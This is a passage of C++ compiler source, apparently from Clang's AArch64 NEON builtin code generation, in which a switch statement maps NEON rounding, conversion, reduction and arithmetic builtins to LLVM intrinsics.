Int = Intrinsic::aarch64_neon_fmaxnm;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vmaxnm");
case NEON::BI__builtin_neon_vrecpss_f32: {
Ops.push_back(EmitScalarExpr(E->getArg(1)));
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_frecps, FloatTy),
Ops, "vrecps");
}
case NEON::BI__builtin_neon_vrecpsd_f64:
Ops.push_back(EmitScalarExpr(E->getArg(1)));
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_frecps, DoubleTy),
Ops, "vrecps");
case NEON::BI__builtin_neon_vrecpsh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(1)));
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_frecps, HalfTy),
Ops, "vrecps");
case NEON::BI__builtin_neon_vqshrun_n_v:
Int = Intrinsic::aarch64_neon_sqshrun;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vqshrun_n");
case NEON::BI__builtin_neon_vqrshrun_n_v:
Int = Intrinsic::aarch64_neon_sqrshrun;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vqrshrun_n");
case NEON::BI__builtin_neon_vqshrn_n_v:
Int = usgn ? Intrinsic::aarch64_neon_uqshrn : Intrinsic::aarch64_neon_sqshrn;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vqshrn_n");
case NEON::BI__builtin_neon_vrshrn_n_v:
Int = Intrinsic::aarch64_neon_rshrn;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrshrn_n");
case NEON::BI__builtin_neon_vqrshrn_n_v:
Int = usgn ? Intrinsic::aarch64_neon_uqrshrn : Intrinsic::aarch64_neon_sqrshrn;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vqrshrn_n");
case NEON::BI__builtin_neon_vrndah_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_round
: Intrinsic::round;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vrnda");
}
case NEON::BI__builtin_neon_vrnda_v:
case NEON::BI__builtin_neon_vrndaq_v: {
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_round
: Intrinsic::round;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrnda");
}
case NEON::BI__builtin_neon_vrndih_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_nearbyint
: Intrinsic::nearbyint;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vrndi");
}
case NEON::BI__builtin_neon_vrndmh_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_floor
: Intrinsic::floor;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vrndm");
}
case NEON::BI__builtin_neon_vrndm_v:
case NEON::BI__builtin_neon_vrndmq_v: {
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_floor
: Intrinsic::floor;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrndm");
}
case NEON::BI__builtin_neon_vrndnh_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_roundeven
: Intrinsic::roundeven;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vrndn");
}
case NEON::BI__builtin_neon_vrndn_v:
case NEON::BI__builtin_neon_vrndnq_v: {
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_roundeven
: Intrinsic::roundeven;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrndn");
}
case NEON::BI__builtin_neon_vrndns_f32: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_roundeven
: Intrinsic::roundeven;
return EmitNeonCall(CGM.getIntrinsic(Int, FloatTy), Ops, "vrndn");
}
case NEON::BI__builtin_neon_vrndph_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_ceil
: Intrinsic::ceil;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vrndp");
}
case NEON::BI__builtin_neon_vrndp_v:
case NEON::BI__builtin_neon_vrndpq_v: {
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_ceil
: Intrinsic::ceil;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrndp");
}
case NEON::BI__builtin_neon_vrndxh_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_rint
: Intrinsic::rint;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vrndx");
}
case NEON::BI__builtin_neon_vrndx_v:
case NEON::BI__builtin_neon_vrndxq_v: {
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_rint
: Intrinsic::rint;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrndx");
}
case NEON::BI__builtin_neon_vrndh_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_trunc
: Intrinsic::trunc;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vrndz");
}
case NEON::BI__builtin_neon_vrnd32x_v:
case NEON::BI__builtin_neon_vrnd32xq_v: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Intrinsic::aarch64_neon_frint32x;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrnd32x");
}
case NEON::BI__builtin_neon_vrnd32z_v:
case NEON::BI__builtin_neon_vrnd32zq_v: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Intrinsic::aarch64_neon_frint32z;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrnd32z");
}
case NEON::BI__builtin_neon_vrnd64x_v:
case NEON::BI__builtin_neon_vrnd64xq_v: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Intrinsic::aarch64_neon_frint64x;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrnd64x");
}
case NEON::BI__builtin_neon_vrnd64z_v:
case NEON::BI__builtin_neon_vrnd64zq_v: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Intrinsic::aarch64_neon_frint64z;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrnd64z");
}
case NEON::BI__builtin_neon_vrnd_v:
case NEON::BI__builtin_neon_vrndq_v: {
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_trunc
: Intrinsic::trunc;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrndz");
}
case NEON::BI__builtin_neon_vcvt_f64_v:
case NEON::BI__builtin_neon_vcvtq_f64_v:
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ty = GetNeonType(this, NeonTypeFlags(NeonTypeFlags::Float64, false, quad));
return usgn ? Builder.CreateUIToFP(Ops[0], Ty, "vcvt")
: Builder.CreateSIToFP(Ops[0], Ty, "vcvt");
case NEON::BI__builtin_neon_vcvt_f64_f32: {
assert(Type.getEltType() == NeonTypeFlags::Float64 && quad &&
"unexpected vcvt_f64_f32 builtin");
NeonTypeFlags SrcFlag = NeonTypeFlags(NeonTypeFlags::Float32, false, false);
Ops[0] = Builder.CreateBitCast(Ops[0], GetNeonType(this, SrcFlag));
return Builder.CreateFPExt(Ops[0], Ty, "vcvt");
}
case NEON::BI__builtin_neon_vcvt_f32_f64: {
assert(Type.getEltType() == NeonTypeFlags::Float32 &&
"unexpected vcvt_f32_f64 builtin");
NeonTypeFlags SrcFlag = NeonTypeFlags(NeonTypeFlags::Float64, false, true);
Ops[0] = Builder.CreateBitCast(Ops[0], GetNeonType(this, SrcFlag));
return Builder.CreateFPTrunc(Ops[0], Ty, "vcvt");
}
case NEON::BI__builtin_neon_vcvt_s32_v:
case NEON::BI__builtin_neon_vcvt_u32_v:
case NEON::BI__builtin_neon_vcvt_s64_v:
case NEON::BI__builtin_neon_vcvt_u64_v:
case NEON::BI__builtin_neon_vcvt_s16_v:
case NEON::BI__builtin_neon_vcvt_u16_v:
case NEON::BI__builtin_neon_vcvtq_s32_v:
case NEON::BI__builtin_neon_vcvtq_u32_v:
case NEON::BI__builtin_neon_vcvtq_s64_v:
case NEON::BI__builtin_neon_vcvtq_u64_v:
case NEON::BI__builtin_neon_vcvtq_s16_v:
case NEON::BI__builtin_neon_vcvtq_u16_v: {
Int =
usgn ? Intrinsic::aarch64_neon_fcvtzu : Intrinsic::aarch64_neon_fcvtzs;
llvm::Type *Tys[2] = {Ty, GetFloatNeonType(this, Type)};
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vcvtz");
}
case NEON::BI__builtin_neon_vcvta_s16_v:
case NEON::BI__builtin_neon_vcvta_u16_v:
case NEON::BI__builtin_neon_vcvta_s32_v:
case NEON::BI__builtin_neon_vcvtaq_s16_v:
case NEON::BI__builtin_neon_vcvtaq_s32_v:
case NEON::BI__builtin_neon_vcvta_u32_v:
case NEON::BI__builtin_neon_vcvtaq_u16_v:
case NEON::BI__builtin_neon_vcvtaq_u32_v:
case NEON::BI__builtin_neon_vcvta_s64_v:
case NEON::BI__builtin_neon_vcvtaq_s64_v:
case NEON::BI__builtin_neon_vcvta_u64_v:
case NEON::BI__builtin_neon_vcvtaq_u64_v: {
Int = usgn ? Intrinsic::aarch64_neon_fcvtau : Intrinsic::aarch64_neon_fcvtas;
llvm::Type *Tys[2] = { Ty, GetFloatNeonType(this, Type) };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vcvta");
}
case NEON::BI__builtin_neon_vcvtm_s16_v:
case NEON::BI__builtin_neon_vcvtm_s32_v:
case NEON::BI__builtin_neon_vcvtmq_s16_v:
case NEON::BI__builtin_neon_vcvtmq_s32_v:
case NEON::BI__builtin_neon_vcvtm_u16_v:
case NEON::BI__builtin_neon_vcvtm_u32_v:
case NEON::BI__builtin_neon_vcvtmq_u16_v:
case NEON::BI__builtin_neon_vcvtmq_u32_v:
case NEON::BI__builtin_neon_vcvtm_s64_v:
case NEON::BI__builtin_neon_vcvtmq_s64_v:
case NEON::BI__builtin_neon_vcvtm_u64_v:
case NEON::BI__builtin_neon_vcvtmq_u64_v: {
Int = usgn ? Intrinsic::aarch64_neon_fcvtmu : Intrinsic::aarch64_neon_fcvtms;
llvm::Type *Tys[2] = { Ty, GetFloatNeonType(this, Type) };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vcvtm");
}
case NEON::BI__builtin_neon_vcvtn_s16_v:
case NEON::BI__builtin_neon_vcvtn_s32_v:
case NEON::BI__builtin_neon_vcvtnq_s16_v:
case NEON::BI__builtin_neon_vcvtnq_s32_v:
case NEON::BI__builtin_neon_vcvtn_u16_v:
case NEON::BI__builtin_neon_vcvtn_u32_v:
case NEON::BI__builtin_neon_vcvtnq_u16_v:
case NEON::BI__builtin_neon_vcvtnq_u32_v:
case NEON::BI__builtin_neon_vcvtn_s64_v:
case NEON::BI__builtin_neon_vcvtnq_s64_v:
case NEON::BI__builtin_neon_vcvtn_u64_v:
case NEON::BI__builtin_neon_vcvtnq_u64_v: {
Int = usgn ? Intrinsic::aarch64_neon_fcvtnu : Intrinsic::aarch64_neon_fcvtns;
llvm::Type *Tys[2] = { Ty, GetFloatNeonType(this, Type) };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vcvtn");
}
case NEON::BI__builtin_neon_vcvtp_s16_v:
case NEON::BI__builtin_neon_vcvtp_s32_v:
case NEON::BI__builtin_neon_vcvtpq_s16_v:
case NEON::BI__builtin_neon_vcvtpq_s32_v:
case NEON::BI__builtin_neon_vcvtp_u16_v:
case NEON::BI__builtin_neon_vcvtp_u32_v:
case NEON::BI__builtin_neon_vcvtpq_u16_v:
case NEON::BI__builtin_neon_vcvtpq_u32_v:
case NEON::BI__builtin_neon_vcvtp_s64_v:
case NEON::BI__builtin_neon_vcvtpq_s64_v:
case NEON::BI__builtin_neon_vcvtp_u64_v:
case NEON::BI__builtin_neon_vcvtpq_u64_v: {
Int = usgn ? Intrinsic::aarch64_neon_fcvtpu : Intrinsic::aarch64_neon_fcvtps;
llvm::Type *Tys[2] = { Ty, GetFloatNeonType(this, Type) };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vcvtp");
}
case NEON::BI__builtin_neon_vmulx_v:
case NEON::BI__builtin_neon_vmulxq_v: {
Int = Intrinsic::aarch64_neon_fmulx;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vmulx");
}
case NEON::BI__builtin_neon_vmulxh_lane_f16:
case NEON::BI__builtin_neon_vmulxh_laneq_f16: {
// vmulx_lane should be mapped to Neon scalar mulx after
// extracting the scalar element
Ops.push_back(EmitScalarExpr(E->getArg(2)));
Ops[1] = Builder.CreateExtractElement(Ops[1], Ops[2], "extract");
Ops.pop_back();
Int = Intrinsic::aarch64_neon_fmulx;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vmulx");
}
case NEON::BI__builtin_neon_vmul_lane_v:
case NEON::BI__builtin_neon_vmul_laneq_v: {
// v1f64 vmul_lane should be mapped to Neon scalar mul lane
bool Quad = false;
if (BuiltinID == NEON::BI__builtin_neon_vmul_laneq_v)
Quad = true;
Ops[0] = Builder.CreateBitCast(Ops[0], DoubleTy);
llvm::FixedVectorType *VTy =
GetNeonType(this, NeonTypeFlags(NeonTypeFlags::Float64, false, Quad));
Ops[1] = Builder.CreateBitCast(Ops[1], VTy);
Ops[1] = Builder.CreateExtractElement(Ops[1], Ops[2], "extract");
Value *Result = Builder.CreateFMul(Ops[0], Ops[1]);
return Builder.CreateBitCast(Result, Ty);
}
case NEON::BI__builtin_neon_vnegd_s64:
return Builder.CreateNeg(EmitScalarExpr(E->getArg(0)), "vnegd");
case NEON::BI__builtin_neon_vnegh_f16:
return Builder.CreateFNeg(EmitScalarExpr(E->getArg(0)), "vnegh");
case NEON::BI__builtin_neon_vpmaxnm_v:
case NEON::BI__builtin_neon_vpmaxnmq_v: {
Int = Intrinsic::aarch64_neon_fmaxnmp;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vpmaxnm");
}
case NEON::BI__builtin_neon_vpminnm_v:
case NEON::BI__builtin_neon_vpminnmq_v: {
Int = Intrinsic::aarch64_neon_fminnmp;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vpminnm");
}
case NEON::BI__builtin_neon_vsqrth_f16: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_sqrt
: Intrinsic::sqrt;
return EmitNeonCall(CGM.getIntrinsic(Int, HalfTy), Ops, "vsqrt");
}
case NEON::BI__builtin_neon_vsqrt_v:
case NEON::BI__builtin_neon_vsqrtq_v: {
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_sqrt
: Intrinsic::sqrt;
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vsqrt");
}
case NEON::BI__builtin_neon_vrbit_v:
case NEON::BI__builtin_neon_vrbitq_v: {
Int = Intrinsic::bitreverse;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrbit");
}
case NEON::BI__builtin_neon_vaddv_u8:
// FIXME: These are handled by the AArch64 scalar code.
usgn = true;
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vaddv_s8: {
Int = usgn ? Intrinsic::aarch64_neon_uaddv : Intrinsic::aarch64_neon_saddv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vaddv_u16:
usgn = true;
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vaddv_s16: {
Int = usgn ? Intrinsic::aarch64_neon_uaddv : Intrinsic::aarch64_neon_saddv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vaddvq_u8:
usgn = true;
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vaddvq_s8: {
Int = usgn ? Intrinsic::aarch64_neon_uaddv : Intrinsic::aarch64_neon_saddv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 16);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vaddvq_u16:
usgn = true;
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vaddvq_s16: {
Int = usgn ? Intrinsic::aarch64_neon_uaddv : Intrinsic::aarch64_neon_saddv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vmaxv_u8: {
Int = Intrinsic::aarch64_neon_umaxv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vmaxv_u16: {
Int = Intrinsic::aarch64_neon_umaxv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vmaxvq_u8: {
Int = Intrinsic::aarch64_neon_umaxv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 16);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vmaxvq_u16: {
Int = Intrinsic::aarch64_neon_umaxv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vmaxv_s8: {
Int = Intrinsic::aarch64_neon_smaxv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vmaxv_s16: {
Int = Intrinsic::aarch64_neon_smaxv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vmaxvq_s8: {
Int = Intrinsic::aarch64_neon_smaxv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 16);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vmaxvq_s16: {
Int = Intrinsic::aarch64_neon_smaxv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vmaxv_f16: {
Int = Intrinsic::aarch64_neon_fmaxv;
Ty = HalfTy;
VTy = llvm::FixedVectorType::get(HalfTy, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], HalfTy);
}
case NEON::BI__builtin_neon_vmaxvq_f16: {
Int = Intrinsic::aarch64_neon_fmaxv;
Ty = HalfTy;
VTy = llvm::FixedVectorType::get(HalfTy, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxv");
return Builder.CreateTrunc(Ops[0], HalfTy);
}
case NEON::BI__builtin_neon_vminv_u8: {
Int = Intrinsic::aarch64_neon_uminv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vminv_u16: {
Int = Intrinsic::aarch64_neon_uminv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vminvq_u8: {
Int = Intrinsic::aarch64_neon_uminv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 16);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vminvq_u16: {
Int = Intrinsic::aarch64_neon_uminv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vminv_s8: {
Int = Intrinsic::aarch64_neon_sminv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vminv_s16: {
Int = Intrinsic::aarch64_neon_sminv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vminvq_s8: {
Int = Intrinsic::aarch64_neon_sminv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 16);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], Int8Ty);
}
case NEON::BI__builtin_neon_vminvq_s16: {
Int = Intrinsic::aarch64_neon_sminv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vminv_f16: {
Int = Intrinsic::aarch64_neon_fminv;
Ty = HalfTy;
VTy = llvm::FixedVectorType::get(HalfTy, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], HalfTy);
}
case NEON::BI__builtin_neon_vminvq_f16: {
Int = Intrinsic::aarch64_neon_fminv;
Ty = HalfTy;
VTy = llvm::FixedVectorType::get(HalfTy, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminv");
return Builder.CreateTrunc(Ops[0], HalfTy);
}
case NEON::BI__builtin_neon_vmaxnmv_f16: {
Int = Intrinsic::aarch64_neon_fmaxnmv;
Ty = HalfTy;
VTy = llvm::FixedVectorType::get(HalfTy, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxnmv");
return Builder.CreateTrunc(Ops[0], HalfTy);
}
case NEON::BI__builtin_neon_vmaxnmvq_f16: {
Int = Intrinsic::aarch64_neon_fmaxnmv;
Ty = HalfTy;
VTy = llvm::FixedVectorType::get(HalfTy, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmaxnmv");
return Builder.CreateTrunc(Ops[0], HalfTy);
}
case NEON::BI__builtin_neon_vminnmv_f16: {
Int = Intrinsic::aarch64_neon_fminnmv;
Ty = HalfTy;
VTy = llvm::FixedVectorType::get(HalfTy, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminnmv");
return Builder.CreateTrunc(Ops[0], HalfTy);
}
case NEON::BI__builtin_neon_vminnmvq_f16: {
Int = Intrinsic::aarch64_neon_fminnmv;
Ty = HalfTy;
VTy = llvm::FixedVectorType::get(HalfTy, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vminnmv");
return Builder.CreateTrunc(Ops[0], HalfTy);
}
case NEON::BI__builtin_neon_vmul_n_f64: {
Ops[0] = Builder.CreateBitCast(Ops[0], DoubleTy);
Value *RHS = Builder.CreateBitCast(EmitScalarExpr(E->getArg(1)), DoubleTy);
return Builder.CreateFMul(Ops[0], RHS);
}
case NEON::BI__builtin_neon_vaddlv_u8: {
Int = Intrinsic::aarch64_neon_uaddlv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddlv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vaddlv_u16: {
Int = Intrinsic::aarch64_neon_uaddlv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddlv");
}
case NEON::BI__builtin_neon_vaddlvq_u8: {
Int = Intrinsic::aarch64_neon_uaddlv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 16);
llvm::Type *Tys[2] = { Ty, VTy };
